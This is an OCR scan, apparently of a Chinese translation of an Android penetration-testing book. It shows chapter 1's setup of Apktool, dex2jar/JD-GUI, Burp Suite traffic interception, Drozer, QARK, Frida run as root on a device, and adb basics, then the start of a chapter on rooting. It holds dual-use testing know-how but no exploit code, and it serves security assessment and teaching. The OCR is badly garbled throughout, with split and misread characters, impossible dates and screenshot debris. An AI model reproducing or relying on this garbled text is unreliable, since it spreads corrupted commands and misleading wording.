Volume Serial Number is 8868-635E 


Directory of C:\APKTOOL 


16/14/2615 2:37 PM <DIR> 
16/14/2615 = <DIR> 


10714/2015 : 6,329,931 apktool_2.0.2.jar 
10714/2015 :30 PM 174, s 
30 F aE 


2 Dirts > 187, 972, 231, 168 bytes free 





启动 Apktool， 使 用 下 面 的 命令 查看 可 用 的 选项 。 


java -jar apktool_2.0.2.jar -help 





=\APKTOOL> java -jar apktool_2.@.2.jar --help 

nrecognized option: ——help 

Apktool v2.0.2 - a tool for reengineering Android apk files 
with smali v2.0.8 and baksmali v2.0.8 

opyright 2614 Ryszard Wi?niewski <brut.alll@gmail.com> 
pdated by Connor Tumbleson <connor.tumbleson@gmail.com> 





isage: apktool 
-advance ,——advanced prints advance information. 
—version,——version prints the version then exits 
apktool if tinstall-framework [options] <framework.apk> 
frame-path <dir> Stores framework files into <dir>. 
tag <tag> Tag frameworks using <tag>. 
apktool d[ecode] [options] <file_apk> 
force Force delete destination directory. 
The name of folder that gets written. Default is apk.ou 


Uses framework files located in <dir>. 
Do not decode resources. 
Do not decode sourc 
frame-tag <tag> Uses framework files tagged by <tag>. 
apktool bluild] [options] <app_path> 
force-all Skip changes detection and build all files 
-o,--output <dir> The name of apk that gets written. Default dist/name 
-apk 
-p.—-frame-path <dir> Uses framework files located in <dir>. 


For additional info, see: http://ibotpeaches.github. io/Apktool/’ 
For smali/baksmali info, see: http://code.google.com/p/smali/ 


=\APKTOOL> 














这 样 就 完成 了 Apktool 的 设置 ， 在 后 续 音 节 中 ， 我 们 将 进一步 研究 Apktool 的 功能 。 


1.3.3 Dex2jar/JD-GUI 


Dex2jar 和 JD-GUI 是 安 卓 应 用 逆向 工程 中 经 常用 到 的 两 个 工具 。Dex2jar 能 将 .dex 文 件 转换 
为 jar 文 件 。JD-GUI 则 是 一 个 Java 反 编译 工具 ， 可 以 将 .jar 文 件 还原 为 原始 的 Java 源 代码 。 


从 下 面 的 链接 中 下 载 这 两 个 工具 。 由 于 它们 是 可 执行 文件 ， 所 以 下 载 后 无 需 安 装 : http:/ 


sourceforge.net/projects/dex2jar/, http://jd.benow.ca. 


6 Java Decompiler - E 


File Edit Navigation Search Help 
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1.3.4 Burp Suite 

HP aS, Burp Suite 是 渗透 测试 中 最 重要 的 工具 之 一 ， 安 单 应 用 也 不 例外 。 本 节 将 介绍 如 
何 设 置 Burp Suite， 并 查看 模拟 需 的 HTTP 流 量 。 

(1) 从 官方 网 站 下 载 最 新 版 本 的 Burp Suite: http://portswigger.net/burp/download.html. 


(2) 双击 下 载 后 的 文件 ， 启 动 Burp Suite。 如 果 下 载 的 文件 在 当前 工作 目录 中 ， 也 可 以 通过 运 
行 下 面 的 命令 启动 Burp Suite。 




















B C:\Windows\system32\cmd.exe 


C2\>java -jar burpsuite_free_vi.6.jar_ 








(3) 运行 上 述 命令 启 动 Burp Suite 后 ， 将 出 现 如 下 图 所 示 的 界面 。 





E Burp Suite Free Edition v1.6 己 | 回 | & 





Burp Intruder Repeater Window Help 


| [target] Proxy Spider | Scanner | intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 


Filter: Hiding not found items; hiding CSS, image and general binary content; hiding 4xx responses; hiding empty folders | ES] 























Host | Method | URL | Params |Status 去 | Length | MIME type | Title 














0 matches 
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(4) 导航 至 Proxy | Options， 配 置 Burp。 默 认 配 置 如 下 图 所 示 。 | 








Target Spider | Scanner | Intruder | Repeater | Sequencer | Decoder | Comparer | Extender | Options | Alerts 
htercept | HTTP history WebSoctets history | Options. | 


@ Proxy Listeners 

















| Burp Proxy uses listeners to receive incoming HTTP requests from your browser. You will need to configure your browser to use 




















(5) 点 击 Edit 按 钮 , 选择 Invisible 选 项 。 具 体操 作 步 又 如 下 : 点 击 Edit 按 钮 , 选择 Request handling 
选项 ， 然 后 选择 Support invisible proxying (enable only if needed)， 如 下 图 所 示 。 





项 Edit proxy listener samaa E 


Binding | Request handing | Certificate 














(2) These settings control whether Burp redirects requests received by this istcnzr 
Redirect to host: 
Redirect to port: 
© Force use of SSL 


Invsibe proxy support allows non-proxy-aware cients to connact directly to the istener 


@ Support invisible proxying (enable only if needed) 














OK Cancel 











a 














(6) 启动 模拟 器 ， 并 完成 配置 ， 使 其 通过 Burp Suite 发 送 流量 。 


1.4 ”配置 安 卓 虚拟 机 
现在 ， 按 照 下 面 的 步 又 对 安 卓 虚 拟 机 进行 配置 ， 使 设备 的 流量 通过 代理 进行 传输 。 








(1) 导航 到 Home ( EEE) | Menu (菜单 ) | Settings (设置 ) | Wirless & networks ( 无 线 和 
网 络 ) | Mobile Networks ( 移动 网 络 ) | Access Point Names ( 接 入 点 名 称 ) o 














(2) 配置 以 下 代理 设置 : 
口 代理 
口 端口 
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下 图 显示 了 工作 站 的 JP 地 址 ， 在 后 面 配 置 安 卓 虚拟 机 时 会 用 到 。 





| 


Windows IP Configuration 


Wireless LAN adapter Wireless Network Connection: 


Connection-specific DNS $ % «5 
Link-local IPv6 Address . . ... : 
IPv4 Addr 





(3) 输入 系统 的 了 地址。 


192.168.1.101 


Cancel 





(4) 输入 端口 号 8080， 如 下 图 所 示 。 


Cancel 





























完成 上 述 操作 后 ， 设 备 的 所 有 HTTP 流 量 将 通过 计算 机 中 的 Burp 代 理 进 行 传输 。 这 个 设置 会 
在 我 们 讨论 弱 服 务 顺 端 控 制 时 派 上 大 用 场 。 





1.4.1 Drozer 




















Drozer 是 一 种 用 于 安 卓 应 用 自动 化 评估 的 工具 。 下 面 是 正常 运行 Drozer 的 步 又 。 
必 备 条 件 


设置 Drozer 时 需 具 备 下 列 条 件 。 





O 一 个 安装 了 下 列 工具 的 工作 站 (我 使 用 的 是 Windows 7 ) 。 


m JRE 或 JDK 
m Android SDK 
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O 一 个 运行 安 卓 2.1 或 更 新 版 本 系统 的 安 卓 设备 或 模拟 器 。 fa 
(1) 首先 ， 从 下 面 的 链接 中 下 载 Drozer 的 安装 文件 和 Agent.apk: https://labs.mwrinfosecurity. 


com/tools/drozer/, 
(2) 如 果 你 的 安装 环境 和 本 书 的 不 同 ， 请 下 载 适合 自己 安装 环境 的 Drozer 版 本 。 


(3) 下 载 完 成 后 ,运行 Drozer 安 装 文件 。 安装 过 程 使 用 了 常见 的 Windows 安 装 向 导 ， 如 下 图 
所 示 。 








i5 Setup - drozer [ens sl 





Welcome to the drozer Setup 
Wizard 
This will install drozer 2.3.3 on your computer. 


It is recommended that you close all other applications before 
continuing. 


Click Next to continue, or Cancel to exit Setup. 



































Next > | | Cancel 
(4) 点 击 Next 按 钮 ， 选 择 Drozer 的 安装 路 径 。 
部 Setup - drozer Gm- 
Select Destination Location 
Where should drozer be installed? a 1 


| Setup will install drozer into the following folder. 


To continue, did Next. If you would like to select a different folder, dick Browse. 


C: \drozer| Browse... 





At least 99.9 MB of free disk space is required. 





<Back || Next> | [Cancel 
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TT 














(5) 如 上 图 所 示 ， 默 认 安 装 路 径 为 Cdrozer。 如 果 你 想 将 自己 的 系统 环境 配置 成 与 本 书 一 样 ， 
建议 选择 默认 安装 路 径 。 接 下 来 ， 跟 着 安装 向 导 完 成 安装 。 安 装 界 面 如 下 图 所 示 。 














i Setup - drozer wae ee enE 
Installing D 
Please wait while Setup installs drozer on your computer. (Gals 


Extracting files... 
C:\drozer \Lib \drozer \modules \tools\setup \busybox 


























(6) 点 击 Finish 按 钮 ， 完 成 安装 。 





[| PRC s) 


5 Setup - drozer 





Completing the drozer Setup 
Wizard 


Setup has finished installing drozer on your computer. The 
application may be launched by selecting the installed icons. 


Click Finish to exit Setup. 





Finish | 


























在 上 述 安装 过 程 中 ， 自 动 安装 了 所 需 的 全 部 Python 依赖 ， 并 设置 了 一 个 完整 的 Python 环境 。 





按照 以 下 步骤 检查 Drozer 是 否 安装 正确 。 
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(1) 打开 新 的 命令 提示 符 并 运行 drozer.bat 文 件 ， 如 下 图 所 示 。 





C:\drozer>drozer.bat 
usage: drozer [COMMAND] 


Run ‘drozer [COMMAND] —-help* for more usage information. 


Commands: 

console start the drozer Console 
manage drozer modules 
start ad er Server 
manage drozer SSL key material 
generate an exploit to deploy drozer 
create custom drozer Agents 

payload generate payloads to deploy drozer 


C:\drozer> 











(2) 下 面 将 前 面 下 载 好 的 agent.apk 安 装 到 你 的 模拟 器 上 。 我 们 可 以 使 用 aqb 命 令 来 安装 .apk 
文件 。 
adb install agent .apk 
C:\>adb install agent .apk 
81 KB/s (629956 bytes in 7.543s) 
pkg: /data/local/tmp/agent .apk 
Success 


GEN? 








(3) 在 开始 使 用 Drozer 进 行 评 估 之 前 , 我 们 需要 将 工作 站 中 的 Drozer 控 制 台 连 接 到 模拟 器 的 代 
理 上 。 为 此 , 我 们 要 在 模拟 顺 上 启动 代理 ， 并 运行 下 面 的 命令 进行 端口 转发 。 在 启动 代理 前 ， 要 
确保 系统 在 运行 脱 入 式 服 务 右 。 








drozer Agent 


drozer 


Embedded Server ® 


31415 








adb forward tcp:31415 tcp:31415 


如 下 图 所 示 ， 命 令 执 行 成 功 ， 没 有 任何 错误 提示 。 


C:\>adb forward tcp:31415 tcp:31415 


C:z\> 











HE 


(4) 接 下 来 ， 只 需 运 行 下 列 命令 ， 将 工作 站 连接 到 代理 上 。 





[path to drozer dir]\drozer.bat console connect 


现在 我 们 将 看 到 Drozer 控 制 台 ， 如 下 图 所 示 。 








C:\drozer>drozer.bat console connect 
Could not find java. P ensure that it is installed and on your PATH. 


If this error persists, specify the path in the ~“/.drozer_config file: 
[executables ] 


java = at T 
Selecting 62196935192 3d sdk 4.4) 


drozer Console ¢v2.3.3> 
dz> 





1.4.2 QARK 不 支持 Windows) 


sý 


sý 








据 GitHub 上 的 官方 页 面 介绍 ,， QARK 是 一 款 方便 易 用 的 工具 ,能 发 现 安 蛙 应 用 中 常见 的 安全 

















是 洞 。 不 同 于 商业 产品 ， tae QARK 突 出 教育 信息 ， 使 得 安全 评估 人 员 能 精确 查找 

















— 


RY 





局 洞 ， 并 对 漏洞 进行 深入 说 明 。QARK 会 自动 利用 多 种 反 编 译 嚣 对 APK 文 件 进行 反 编译 ,综合 利 








zÈ 





它们 的 输出 ， 编 译 出 较 好 的 文件 。 
QARK 使 用 静态 分 析 技术 来 查找 安 卓 应 用 和 源 代码 中 的 漏洞 。 
准备 工作 
在 撰写 本 书 时 ，QARK 只 支持 Linux 和 Mac 系 统 。 

















(1) 可 以 通过 下 面 的 链接 下 载 AARK: https://github.com/linkedin/qark/。 
(2) 解压 QARK， 如 下 图 所 示 。 
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srini's MacBook: qark-master srini@x00$ ls 

LICENSE modules samp leApps 

README. md parsetab. py settings.properties 
build parsetab. pyc styles.css 
exploitAPKs poc temp 

lib qark. py template3 

logs report 








srini's MacBook:qark-master sriniox00$ I 





A 
| Q 确保 你 安装 了 GitHub 页 面 中 提 到 的 所 有 QARK 依 赖 项 


(3) 导航 到 QARK 目 录 ， 并 输入 如 下 命令 。 
python qark.py 


它 会 启动 QARK 的 交互 控制 台 ， 如 下 图 所 示 。 





. d88888b. d8888 8888888b. 888 d8P 
d88P" "Y88b d88888 888 Y88b 888 d8P 
888 888 d88P888 888 888 888 d8P 
888 888 d88P 888 888 d88P 888d88K 
888 888 d88P 888 8888888P" 8888888b 
888 Y8b 888 d88P 888 888 T88b 888 Y88b 


Y88b. Y8b88P d8888888888 888 T88b 888 Y88b 
"Y888888" d88P 888 888 T88b 888 Y88b 
Y8b 


INFO - initializing és 
INFO ~ Identified Android SDK 
INFO Ini tializi ng QARK 


installation from a previous run. 


Do you want to examine: 
[1] APK 
[2] Source 








Enter your choice: 





1.4.3 Chrome 浏览 器 的 Advanced REST Client 扩展 程序 








Advanced REST Client 是 Chrome 浏 览 器 的 一 个 扩展 程序 ， TEREST API (通常 是 移动 应 用 的 一 
部 分 ) 的 渗透 测试 中 有 着 重要 作用 。 


(1) 安装 谷歌 Chrome 浏 览 圳 。 
(2) 打开 链接 : https://chrome.google.com/webstore/category/apps. 


(3) 搜索 AdvancedREST client, 会 出 现下 面 的 Chrome 扩 展 程序 。 点击 ADD TO CHROME 按 钮 ， 
将 其 添加 到 浏览 器 中 。 














(4) 然后 ， 会 弹出 确认 信息 ， 如 下 图 所 示 。 


Add “Advanced REST client"? 
It can: 


. Read and change your browsing history 





* Read and change all your data on the 


websites you visit 


(5) 将 这 个 扩展 程序 添加 到 Chorme 浏 览 器 后 就 可 以 使 用 了 ， 如 下 图 所 示 。 

















e> C D chrome-extension://hgmloofddffdnphfgcellkdfbfbjeloo/RestClient.html 


Advanced Rest [Unnamed] 
Client 


>i UR 


| Request @GET ©POST OPUT OPATCHODELETE ©HEAD © OPTIONS © Other 
Socket Raw Form Headers 

Projects 

Saved 

History 

Settings 

About 











1.4.4 Droid Explorer 


在 本 书 中 , 大 部 分 时 候 都 会 使 用 命令 行 工具 来 浏览 安 卓 文件 系统 ， 从 设备 中 提取 数据 或 者 推 
送 数 据 到 设备 上 。 如 果 你 偏爱 GUI 界 面 ， 你 将 会 乐于 使 用 Droid Explorer。 它 是 一 款 在 ROOT 过 的 
设备 上 浏览 安 卓 文件 系统 的 GUI 工 具 。 





可 以 从 下 面 的 链接 下 载 Droid Explorer: http://de.codeplex.com。 
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® Droid Explorer: 4dflfode0f6a8f5d Cos — |S] Y: 








~ [0 > 4dftfodeoréastsd » ~ [+] 








à E- aeoo 
Edit Tools Help B Connect to Device Donate 
*BaacheDdhis se BOAS 
I x R 
acct @ u QO 
cache acct cache config d data dev efs etc extSdCard 





4 


dey Q Q 
efs factory mnt preload proc root sbin sdcard storage sys 


m 


b i etc 
b i extSdCard 


; ea @ Q fl 


mnt 
preload system tmp-mksh tombstones usbdisk0 vendor defaultprop file_contexts fstab.smdk... init 


proc 
root 
sbin 
”局 sdcard 
storage 
sys 
system X El El El = 
42 objects 389.77KB ..: 


mW 














initcmrc initenviron.re initre initsmdk4xl... initsmdk4x1... initsuperus... inittargetre inittrace.rc initusb.re > 





























1.4.5 Cydia Substrate 和 Introspy 


Introspy 是 一 个 黑 盒 工具 ， 不 仅 有 助 于 我 们 了 解 安 卓 应 用 在 运行 时 所 执行 的 操作 ， 还 有 助 于 
我 们 发 现 潜在 的 安全 问题 。 


安 卓 版 的 Instropy 包 含 两 个 模块 。 


Q Tracer: 它 是 一 个 GUI 界 面 ， 有 助 于 我 们 选择 一 个 或 多 个 目标 应 用 以 及 想 要 运行 的 测试 
项 目 。 























m Cydia Substrate 扩 展 (核心 ): 它 是 Instropy 的 核心 引擎， 用 于 hookz 应 用 。 它 能 帮助 我 们 
在 运行 时 分 析 应 用 并 查找 漏洞 。 


口 Analyser: 它 通 过 分 析 Tarcer 保 存 的 数据 库 ， 并 生成 报告 来 帮助 我 们 进行 更 深入 的 分 析 。 
按照 下 面 的 步 又 设置 Introspy。 

(1) 通过 下 面 的 链接 下 载 Intospy Tracer: https://github.com/iSECPartners/Introspy-Android. 
(2) 通过 下 面 的 链接 下 载 Intospy Analyzer: https://github.com/iSECPartners/Introspy-Analyzer. 


(3) 想 要 成 功 安装 Introspy, 需要 先 安装 安 章 版 的 Cydia Substrate。 我 们 可 以 从 安 卓 Play 商店 中 
下 载 并 安装 Cydia Substrate。 





























mY 

















中 一 种 通过 拦截 函数 回调 、 消 息 传递 、 事 件 等 来 改变 应 用 行为 的 技术 。 一 一 译 者 注 


re 
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Cydia Substrate 
SAURIKIT, LLC 


py OPEN 


UNINSTALL 








keke 2,851 27-Sep-2013 
1,00,000+ downloads 1.50MB 


Q +1| 2,248 people +1'd this 














(4) 安装 第 一 步 中 下 载 的 Introspy-Android Config.apk 和 Introspy-Android Core.apk， 下 面 是 使 
用 aqb 安 装 这 两 个 个 应 用 的 命令 。 





adb install Introspy-Android Config.apk 
adb install Introspy-Android Core.apk 


安装 成 功 后 ， 会 出 现 如 下 图 所 示 的 两 个 图 标 。 





Substrate Introspy Config 





1.4.6 SQLite browser 
我 们 在 处 理 安 卓 应 用 时 经 常会 遇 到 SQLite 数 据 库 。 
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SQLite browser 是 一 款 用 于 连接 SQLite 数 据 库 的 工具 ， 让 我 们 可 以 通过 简单 易 用 的 界面 来 进 | 
行 数据 库 操作 。 

(1) 通过 下 面 的 链接 下 载 SQLite browser: http://sqlitebrowser.org。 

(2) 运行 安装 文件 ， 并 根据 提示 完成 安装 ( 安装 过 程 很 简单 )。 








@ DB Browser for SQLite Setup =a 


Installing 
Please wait while DB Browser for SQLite is being installed. 





Execute: C:\Program Files (x86)\SqliteBrowser3\tmp\vcredist_x86.exe /install /passive /quiet 
] 
| 


Show details 


Nullsoft Install System v3.0b1 


< Back Next > Cancel 











(3) 安装 完成 后 ， 将 会 出 现 如 下 图 所 示 的 界面 。 





E DB Browser for SQLite = 9 
File | Edit View Help 














Db New Database 三 Open Database Ñ Write Changes È Revert Changes 




















= = 7 Schema ax 
| Database Structure | Browse Data | EditPragmas | Execute SQL | (œ | 
Name Ty 
g Create Table |3 Modify Table id Delete Table 
| Name Type 
< > 
< > 



































SQLLog | Plot | DBSchema | 








UTF-8 
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1.4.7 Frida 





Frida 是 一 个 对 应 用 进行 动态 搬 桩 的 框架 ， 支 持 安 卓 、iOS 、Windows 和 Mac 等 多 个 平台 。 它 
能 帮助 我 们 hook 应 用 ， 并 对 其 进行 运行 时 操纵 。 

















下 面 是 相关 的 重要 链接 : https:/github.com/frida/frida 和 http:/www.frida.re/docs/android/。 
下 面 介绍 如 何 设置 Frida， 本 例 使 用 的 是 Mac。 
必 备 条 件 


口 Frida 客 户 端 : 在 工作 站 上 运行 。 
O Fridaik ah: 在 设备 上 运行 。 








1. 设置 Frida 服 务 器 
At 





(1) 使 用 下 面 的 命令 将 Frida 服 务 器 下 载 到 本 地 计算 机 上 。 


curl -O http://build.frida.re/frida/android/arm/bin/frida-server 


$ curl -O http://build.frida.re/frida/android/arm/bin/frida-server 
% Total % Received % Xferd Average Speed Time Time 
Time Current 


Dload Upload Total Spent 


Left Speed 

100 12.0M 100 12.0M 0 0 232k 0 0:00:53 0:00:53 
--:--:-- 166k 

$ 


以 上 代码 会 把 Frida 服 务 器 二 进 制 文件 下 载 到 工作 站 的 当前 路 径 中 。 
(2) 使 用 下 面 的 命令 赋予 Frida 服 务 器 运行 权限 。 





chmod +x frida-server 

(3) 使 用 aqb push 命 令 将 Frida 服 务 器 二 进 制 文件 推送 到 设备 ， 如 下 所 示 。 
$ adb push frida-server /data/local/tmp/ 

(4) 接 下 来 启动 设备 shell 获 取 root 权 限 ， 并 运行 Frida 服 务 器 ， 如 下 所 示 。 


$ adb shell 

shell@android:/ $ su 

root@android:/ # cd /data/local/tmp 
root@android:/data/local/tmp # ./frida-server & 
[1] 5376 

root@android:/data/local/tmp # 
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2. 设置 Frida 客 户 端 


运行 下 面 的 命令 安装 Frida 客 户 端 。 





$ sudo pip install frida 
Password: 
Downloading/unpacking frida 
Downloading frida-5.0.10.zip 
Running setup.py (path:/private/tmp/pip_build_root/frida/setup.py) egg_ 
info for package frida 


Downloading/unpacking colorama>=0.2.7 (from frida) 

Downloading colorama-0.3.3.tar.gz 

Running setup.py (path:/private/tmp/pip_build_root/colorama/setup.py) 
egg_info for package colorama 


Downloading/unpacking prompt-toolkit>=0.38 (from frida) 
Downloading prompt_toolkit-0.53-py2-none-any.whl (188kB): 188kB 
downloaded 
Downloading/unpacking pygments>=2.0.2 (from frida) 
Downloading Pygments-2.0.2-py2-none-any.whl (672kB): 672kB downloaded 
Requirement already satisfied (use --upgrade to upgrade): six>=1.9.0 
in /Library/Python/2.7/site-packages/six-1.9.0-py2.7.egg (from prompt- 
toolkit>=0.38->frida) 
Downloading/unpacking wcwidth (from prompt-toolkit>=0.38->frida) 
Downloading wewidth-0.1.5-py2.py3-none-any.whl 
Installing collected packages: frida, colorama, prompt-toolkit, pygments, 
wewidth 
Running setup.py install for frida 
downloading prebuilt extension from https://pypi.python.org/ 
packages/2.7/f/frida/frida-5.0.10-py2.7-macosx-10.11-intel.egg 
extracting prebuilt extension 


Installing frida-ls-devices script to /usr/local/bin 

Installing frida script to /usr/local/bin 

Installing frida-ps script to /usr/local/bin 

Installing frida-trace script to /usr/local/bin 

Installing frida-discover script to /usr/local/bin 
Running setup.py install for colorama 


Successfully installed frida colorama prompt-toolkit pygments wcwidth 
Cleaning up... 


$ 

检查 设置 

现在 服务 器 和 客户 端 都 准备 好 了 ， 在 开始 使 用 它们 之 前 ， 我 们 需要 使 用 adb 配 置 端口 转发 。 
使 用 下 面 的 命令 开启 端口 转发 。 


$ adb forward tcp:27042 tcp:27042 
$ adb forward tcp:27043 tcp:27043 
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输入 --help 查 看 Frida 客 户 端 选 项 ; 





$ frida-ps --help 
Usage: frida-ps [options] 


Options: 
--version show program's version number and exit 
-h, --help show this help message and exit 
-D ID, --device=ID connect to device with the given ID 
-U, --usb connect to USB device 
-R, --remote connect to remote device 
-a, --applications list only applications 
-i, --installed include all installed applications 
$ 


从 上 面 的 输出 中 可 以 看 出 , 我 们 可 以 使 用 -R 命 令 来 连接 远程 设备 。 这 个 命令 可 以 作为 基本 测 
试 ， 用 来 测试 我 们 的 设置 。 


177 ATFWD-daemon 

233 adbd 

4722 android.process.media 
174 cnd 

663 com.android.phone 
4430 com.android.settings 
757 com.android.smspush 
512 com.android.systemui 


138 vold 
2533 wpa_supplicant 
158 zygote 

$ 


如 上 所 示 ， 和 运行 过 程 以 列表 的 形式 呈现 出 来 。 


148 易 受 攻击 的 应 用 


我 们 将 以 几 种 易 受 攻击 的 安 卓 应 用 为 例 , 介绍 一 些 针 对 安 卓 应 用 的 典型 攻击 。 下 列 应 用 为 读 
者 学 习 安 卓 安全 提供 了 一 个 安全 且 合 法 的 环境 。 


QO GoatDroid: 











https://github.com/jackMannino/OWASP-GoatDroid-Project; 
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口 SSHDroid : 
https://play.google.com/store/apps/details?id=berserker.android.apps.sshdroid&hl=en ; 
DQ FTP Server: 


https://play.google.com/store/apps/details?id=com.theolivetree. ftpserver&hl=en. 


1.4.9 Kali Linux 
Kali Linux 是 用 来 进行 渗透 测试 的 Linux 发 行 版 ， 安 全 专家 经 常用 它 来 进行 各 种 安全 测试 。 


建议 读者 在 VirtualBox 或 VMware 上 安装 Kali Linux， 以 便 从 网 络 层 对 安 卓 设备 进行 攻击 。 可 
以 从 下 面 的 链接 下 载 Kali Linux: https://www.kali.org/downloads/。 























1.5 adb 入 门 


adb 是 一 款 对 安 卓 应 用 进行 渗透 测试 的 必 备 工具 ， 本 书 还 有 多 处 会 用 到 这 个 工具 。Android 
SDK 默 认 自 带 adb, 它 位 于 Android a toos HRP, 在 安装 SDK 的 过 程 中 , 我 们 已 经 
将 其 路 径 添加 到 系统 环境 变量 中 。 下 面 介绍 这 款 工具 的 一 些 应 用 。 














站 


1.5.1 检查 已 连接 的 设备 
我 们 可 以 通过 下 面 的 命令 来 使 用 aqp 列 出 已 连接 到 工作 站 的 设备 。 





adb devices 


>= \Padb devices 
t of devices attached 
emulator -5554 device 


G:\> 














如 上 图 所 示 ， 笔 记 本 电脑 中 运行 了 一 个 模拟 器 











如 果 你 把 手机 连接 到 了 工作 站 ,但 是 adb 没 有 列 出 你 的 手机 ,请 检查 是 否 做 
到 了 以 下 两 点 : 


口 手机 USB 调 试 Ps 
口 工作 站 安装 了 适合 该 手机 的 驱动 。 
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1.5.2 ”启动 shell 
可 以 通过 下 面 的 命令 使 用 adb 启 动 模拟 器 或 设备 上 的 shell。 


adb shell 


























6:7 # whoami 


root@gener K > tt 





上 面 的 命令 将 为 已 连接 的 设备 打开 一 个 shell。 
当真 机 和 模拟 器 同时 连接 时 ， 可 以 通过 下 面 的 命令 打开 模拟 器 的 shell。 


adb -e shell 
当真 机 和 模拟 器 同时 连接 时 ， 可 以 通过 下 面 的 命令 打开 真 机 的 shell。 
adb -d shell 
当 有 多 个 设备 或 模拟 器 连接 时 ， 可 以 通过 下 面 的 命令 打开 指定 目标 的 shell。 


adb -s [设备 名 称 ] 





























1.5.3” 列 出 软件 包 


当 使 用 aap 连 接 到 安 卓 设备 的 shell 时 , A E S 使 用 pm 
( package manager 的 缩写 ， 即 包 管理 器 ) “ 列 出 已 安装 的 软件 包 ” 就 是 其 中 一 例 。 


我 们 可 以 使 用 下 面 的 命令 列 出 设备 中 已 安装 的 所 有 软件 包 。 

















pm list packages 


tele Hon 
:alendar 


ads 
g 2ssaging 

m.andro 

-andro 

-andro 

-android. 

n.android. 
mn.android. 

-android 

“oid 

n.android.c 

-android.la 

-android. 

-android 

-android 

-android 

-android.s 
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1.5.4 推送 文件 到 设备 
我 们 可 以 使 用 下 面 的 语法 将 工作 站 的 数据 推送 到 设备 上 。 
adb push [本 地 计算 机 上 的 文件 路 径 ] [设备 上 的 路 径 ] 
我 们 来 实际 操作 一 下 。 现 在 ， 在 我 的 当前 目录 下 有 一 个 test.txt 文 件 。 














C:N>type test.txt 
sample file 
C:、\> 





输入 以 下 命令 ， 将 这 个 文件 移动 到 模拟 器 中 。 
adb push test .txt /data/local/tmp 


C:\>adb push test.txt /data/local/tmp 
A KB/s (11 bytes in 6.619s> 





| 提示 : /data/local/tmp 是 安 车 设备 上 的 一 个 可 写 目 录 。 


15.5 从 设备 中 拉 取 文件 
同样 ， 我 们 也 可 以 通过 aqb 使 用 下 面 的 语法 将 文件 或 数据 从 设备 拉 取 到 工作 站 上 。 
adb pull [设备 上 的 文件 ] 


首先 ， 删 除 当 前 目录 下 的 testtxt 文 件 。 























:N\>del1 test.txt 


CN>type test .txt 


he system cannot find the file specified. 


SEND 





然后 ， 输 入 下 面 的 命令 ， 将 位 于 设备 /data/localtmp 目 录 下 的 文件 拉 取 出 来 。 
adb pull /data/local/tmp/test.txt 
C:\>adb pull /data/local/tmp/test .txt 


Ø KB/s <ii bytes in @.061s>» 


C:\>type test .txt 


sample file 





1.5.6 通过 adb 安装 应 用 
如 前 文 所 述 ， 可 以 通过 下 面 的 语法 来 安装 应 月 




















ag 
o 
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adb install [文件 名 .apk] 


接 下 来 ,使 用 下 面 的 命令 安装 Drozer 代 理应 用 。 








C:\>adb install droz ge T apk 
77 KB/s (633111 byt i 
pkg: /data/1 /tmp/drozer—agent—2 .3.4.apk 


Success 


= 





如 图 所 示 ， 应 用 已 安装 成 功 。 








如 果 尝 试 安装 一 个 已 经 存在 在 目标 设备 或 模拟 器 上 的 应 用 ,adb 将 弹出 如 下 
> 图 所 示 的 安装 失败 的 提示 。 重 新 安装 之 前 需要 先 删 除 已 存在 的 应 用 。 


C:\>adb install drozer—agent—2.3.4.apk 
946 KB/s (633111 bytes in 1.818s) 
/data/local/tmp/drozer—agent—2.3.4.apk 


kg: 
ailure TINSTALL. PAILED_ALR ADY_EXISTS] 


ane | 





1.5.7 adb 连接 故障 排除 


adb 经 常 无 法 识别 模拟 器 ， 即 使 模拟 器 运行 正常 。 要 排除 这 个 故障 ， 可 以 运行 下 面 的 命令 列 
出 已 连接 到 机 器 上 的 设备 。 














adb devices 


下 面 的 命令 将 会 结束 设备 上 的 adb daemon， 并 将 它 重 启 。 





adb kill-server 


=\Dadb kill-server 


=\?adb devices 
ist of devices attached 
daemon not running. starting it now on port 5837 * 


daemon started successfully * 
mulator-5554 device 


SEND 





1.6 小结 


在 本 章 中 , 我 们 安装 了 对 安 卓 移动 应 用 和 设备 进行 安全 评估 所 需 的 工具 。 其 中 包括 一 些 静 态 
工具 ， 比 如 JD-GUI 和 dex2jar， 便 于 在 不 运行 应 用 的 情况 下 进行 静态 分 析 。 此 外 ， 还 包括 一 些 动 
态 分 析 工 具 ， 比 如 Frida 和 模拟 器 ， 有 助 于 我 们 在 应 用 运行 时 进行 动态 分 析 。 


下 一 章 将 讨论 安 卓 ROOT 的 概念 。 









































安 卓 ROOT 











本 章 介绍 ROOT 安 绅 设备 所 使 用 的 常用 技术 。 首 先 介绍 ROOT 的 基础 知识 及 其 利 浆 ， 接 下 来 
将 讨论 安 卓 分 区 布局 、bootloader boot loader 解 锁 技 术 等 内 容 。 本 章 可 以 当 作 一 份 学 习 指南 ,， 非 
常 适 合 那些 想 要 ROOT 自己 的 设备 以 及 想 在 动手 前 先 详 细 了 解 ROOT 概 念 的 读者 。 


下 面 是 本 章 主 要 介绍 的 内 容 。 


口 什么 是 ROOT 
口 ROOT 的 好 处 和 坏处 
口 锁定 和 解锁 boot loader 


口 官方 recovery 和 第 三 方 recovery 
口 ROOT 安 卓 设备 























2.1 什么 是 ROOT 


安 卓 是 基于 Linux 内 核 的 系统 。 在 像 Linux 这 种 基于 Unix 的 系统 中 ,我 们 可 以 看 到 两 种 用 户 账 
P: 一 种 是 普通 用 户 账户 ， 另 一 种 是 root 账 户 。 普 通用 户 账户 的 权限 通常 比较 低 ， 在 进行 软件 安 
装 、 操 作 系 统 设置 更 改 等 特权 操作 之 前 需要 获得 root 权 限 。 而 root 账 户 享有 诸如 更 新 应 用 、 安 装 
软件 、 执 行 命令 等 权限 。 基 本 上 ，root 账 户 能 对 整个 系统 进行 更 精细 化 的 控制 。 这 种 权限 分 离 的 
模式 是 Linux 安 全 性 的 重要 特点 之 一 。 


如 前 文 所 述 ， 安 卓 是 基于 Linux 内 核 的 操作 系统 。 因 此 ， 传 统 Linux 系 统 的 很 多 特性 也 会 在 安 
章 设备 上 体现 出 来 , 权限 分 离 就 是 其 中 之 一 。 当 你 购买 了 一 个 全 新 的 安 章 设备 , 从 技术 角度 而 言 ， 
你 并 不 是 该 设备 的 所 有 者 。 也 就 是 说 ， 当 你 对 设备 进行 只 有 root 账 户 才 可 以 进行 的 特权 操作 时 将 
会 受到 限制 。 这 种 通过 获得 root 权 限 来 获得 对 设备 完全 控制 的 行为 被 称 为 ROOT。 


